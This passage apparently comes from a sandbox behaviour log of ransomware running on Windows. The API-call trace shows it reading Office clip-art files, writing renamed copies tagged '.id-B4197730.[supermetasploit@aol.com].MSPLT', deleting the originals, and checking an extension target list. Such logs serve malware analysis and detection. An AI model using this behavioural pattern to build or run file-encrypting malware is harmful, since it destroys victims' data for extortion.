lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xc30, lpOverlapped=0x0) returned 1 [0289.668] WriteFile (in: hFile=0x464, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xc40, lpOverlapped=0x0) returned 1 [0289.670] ReadFile (in: hFile=0x460, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0289.670] WriteFile (in: hFile=0x464, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0289.670] SetEndOfFile (hFile=0x464) returned 1 [0289.670] CloseHandle (hObject=0x464) returned 1 [0289.672] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0289.672] SetEndOfFile (hFile=0x460) returned 1 [0290.086] CloseHandle (hObject=0x460) returned 1 [0290.086] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0290.362] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0290.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.363] lstrlenW (lpString=".doc") returned 4 [0290.363] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0290.363] lstrlenW (lpString=".docx") returned 5 [0290.363] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0290.363] lstrlenW (lpString=".pdf") returned 4 [0290.363] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0290.363] lstrlenW (lpString=".xls") returned 4 [0290.363] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0290.363] lstrlenW (lpString=".xlsx") returned 5 [0290.363] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0290.363] lstrlenW (lpString=".ppt") returned 4 [0290.363] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0290.363] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.363] lstrlenW (lpString=".zip") returned 4 [0290.363] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0290.363] lstrlenW (lpString=".rar") returned 4 [0290.363] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0290.363] lstrlenW (lpString=".bz2") returned 4 [0290.363] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0290.364] lstrlenW (lpString=".7z") returned 3 [0290.364] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0290.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.364] lstrlenW (lpString=".dbf") returned 4 [0290.364] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0290.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.364] lstrlenW (lpString=".1cd") returned 4 [0290.364] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0290.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.364] lstrlenW (lpString=".jpg") returned 4 [0290.364] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0290.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.364] lstrlenW (lpString=".doc") returned 4 [0290.364] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0290.364] lstrlenW (lpString=".docx") returned 5 [0290.364] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0290.364] lstrlenW (lpString=".pdf") returned 4 [0290.364] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0290.364] lstrlenW (lpString=".xls") returned 4 [0290.364] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0290.364] lstrlenW (lpString=".xlsx") returned 5 [0290.364] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0290.364] lstrlenW (lpString=".ppt") returned 4 [0290.364] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0290.364] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.364] lstrlenW (lpString=".zip") returned 4 [0290.364] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0290.364] lstrlenW (lpString=".rar") returned 4 [0290.365] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0290.365] lstrlenW (lpString=".bz2") returned 4 [0290.365] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0290.365] lstrlenW (lpString=".7z") returned 3 [0290.365] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0290.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.365] lstrlenW (lpString=".dbf") returned 4 [0290.365] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0290.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.365] lstrlenW (lpString=".1cd") returned 4 [0290.365] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0290.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 68 [0290.365] lstrlenW (lpString=".jpg") returned 4 [0290.365] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0290.365] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0290.365] lstrlenW (lpString="AN00853_.WMF") returned 12 [0290.365] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0290.368] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=20578) returned 1 [0290.368] CloseHandle (hObject=0x454) returned 1 [0290.368] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf")) returned 0x220 [0290.369] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0290.369] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.370] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.370] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0290.370] GetLastError () returned 0x0 [0290.370] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x5062, lpOverlapped=0x0) returned 1 [0290.373] WriteFile (in: hFile=0x450, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x5070, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x5070, lpOverlapped=0x0) returned 1 [0290.375] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0290.375] WriteFile (in: hFile=0x450, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0290.375] SetEndOfFile (hFile=0x450) returned 1 [0290.375] CloseHandle (hObject=0x450) returned 1 [0290.381] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.381] SetEndOfFile (hFile=0x454) returned 1 [0290.385] CloseHandle (hObject=0x454) returned 1 [0290.385] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0290.385] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00853_.wmf")) returned 1 [0290.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.386] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.386] lstrlenW (lpString=".doc") returned 4 [0290.387] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0290.387] lstrlenW (lpString=".docx") returned 5 [0290.387] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0290.387] lstrlenW (lpString=".pdf") returned 4 [0290.387] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0290.387] lstrlenW (lpString=".xls") returned 4 [0290.387] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0290.387] lstrlenW (lpString=".xlsx") returned 5 [0290.387] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0290.387] lstrlenW (lpString=".ppt") returned 4 [0290.387] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0290.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.387] lstrlenW (lpString=".zip") returned 4 [0290.387] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0290.387] lstrlenW (lpString=".rar") returned 4 [0290.387] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0290.387] lstrlenW (lpString=".bz2") returned 4 [0290.387] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0290.387] lstrlenW (lpString=".7z") returned 3 [0290.387] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0290.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.387] lstrlenW (lpString=".dbf") returned 4 [0290.387] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0290.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.387] lstrlenW (lpString=".1cd") returned 4 [0290.387] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0290.387] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.387] lstrlenW (lpString=".jpg") returned 4 [0290.387] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0290.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.388] lstrlenW (lpString=".doc") returned 4 [0290.388] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0290.388] lstrlenW (lpString=".docx") returned 5 [0290.388] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0290.388] lstrlenW (lpString=".pdf") returned 4 [0290.388] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0290.388] lstrlenW (lpString=".xls") returned 4 [0290.388] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0290.388] lstrlenW (lpString=".xlsx") returned 5 [0290.388] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0290.388] lstrlenW (lpString=".ppt") returned 4 [0290.388] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0290.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.388] lstrlenW (lpString=".zip") returned 4 [0290.388] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0290.388] lstrlenW (lpString=".rar") returned 4 [0290.388] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0290.388] lstrlenW (lpString=".bz2") returned 4 [0290.388] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0290.388] lstrlenW (lpString=".7z") returned 3 [0290.388] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0290.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.388] lstrlenW (lpString=".dbf") returned 4 [0290.388] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0290.388] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.388] lstrlenW (lpString=".1cd") returned 4 [0290.389] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0290.389] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00853_.WMF") returned 68 [0290.389] lstrlenW (lpString=".jpg") returned 4 [0290.389] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0290.389] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0290.389] lstrlenW (lpString="AN00914_.WMF") returned 12 [0290.389] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0290.389] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=10832) returned 1 [0290.389] CloseHandle (hObject=0x454) returned 1 [0290.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf")) returned 0x220 [0290.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0290.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0290.390] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.390] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.390] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0290.391] GetLastError () returned 0x0 [0290.391] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x2a50, lpOverlapped=0x0) returned 1 [0290.393] WriteFile (in: hFile=0x450, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0x2a60, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0x2a60, lpOverlapped=0x0) returned 1 [0290.395] ReadFile (in: hFile=0x454, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0x0, lpOverlapped=0x0) returned 1 [0290.395] WriteFile (in: hFile=0x450, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xec, lpOverlapped=0x0) returned 1 [0290.395] SetEndOfFile (hFile=0x450) returned 1 [0290.395] CloseHandle (hObject=0x450) returned 1 [0290.684] SetFilePointerEx (in: hFile=0x454, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0290.684] SetEndOfFile (hFile=0x454) returned 1 [0290.688] CloseHandle (hObject=0x454) returned 1 [0290.688] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x220) returned 1 [0290.972] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00914_.wmf")) returned 1 [0291.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.135] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.135] lstrlenW (lpString=".doc") returned 4 [0291.135] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0291.135] lstrlenW (lpString=".docx") returned 5 [0291.135] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0291.135] lstrlenW (lpString=".pdf") returned 4 [0291.135] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0291.135] lstrlenW (lpString=".xls") returned 4 [0291.135] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0291.135] lstrlenW (lpString=".xlsx") returned 5 [0291.135] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0291.135] lstrlenW (lpString=".ppt") returned 4 [0291.135] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.136] lstrlenW (lpString=".zip") returned 4 [0291.136] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0291.136] lstrlenW (lpString=".rar") returned 4 [0291.136] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString=".bz2") returned 4 [0291.136] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString=".7z") returned 3 [0291.136] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0291.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.136] lstrlenW (lpString=".dbf") returned 4 [0291.136] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.136] lstrlenW (lpString=".1cd") returned 4 [0291.136] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.136] lstrlenW (lpString=".jpg") returned 4 [0291.136] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.136] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.136] lstrlenW (lpString=".doc") returned 4 [0291.136] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString=".docx") returned 5 [0291.136] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0291.136] lstrlenW (lpString=".pdf") returned 4 [0291.136] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0291.136] lstrlenW (lpString=".xls") returned 4 [0291.137] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0291.137] lstrlenW (lpString=".xlsx") returned 5 [0291.137] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0291.137] lstrlenW (lpString=".ppt") returned 4 [0291.137] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0291.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.137] lstrlenW (lpString=".zip") returned 4 [0291.137] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0291.137] lstrlenW (lpString=".rar") returned 4 [0291.137] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0291.137] lstrlenW (lpString=".bz2") returned 4 [0291.137] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0291.137] lstrlenW (lpString=".7z") returned 3 [0291.137] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0291.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.137] lstrlenW (lpString=".dbf") returned 4 [0291.137] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0291.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.137] lstrlenW (lpString=".1cd") returned 4 [0291.137] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0291.137] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00914_.WMF") returned 68 [0291.137] lstrlenW (lpString=".jpg") returned 4 [0291.137] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0291.137] lstrcmpiW (lpString1=".WMF", lpString2=".MSPLT") returned 1 [0291.138] lstrlenW (lpString="AN01039_.WMF") returned 12 [0291.138] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0292.533] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x2acff14 | out: lpFileSize=0x2acff14*=3344) returned 1 [0292.533] CloseHandle (hObject=0x468) returned 1 [0292.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf")) returned 0x220 [0292.533] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0292.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0292.535] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.535] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2acfec0 | out: lpNewFilePointer=0x0) returned 1 [0292.535] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x46c [0292.536] GetLastError () returned 0x0 [0292.537] ReadFile (in: hFile=0x468, lpBuffer=0x3a8b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2acfecc, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesRead=0x2acfecc*=0xd10, lpOverlapped=0x0) returned 1 [0292.675] WriteFile (in: hFile=0x46c, lpBuffer=0x3a8b020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x2acfc94, lpOverlapped=0x0 | out: lpBuffer=0x3a8b020*, lpNumberOfBytesWritten=0x2acfc94*=0xd20, lpOverlapped=0x0) returned 1 [0292.678] ReadFile (in: 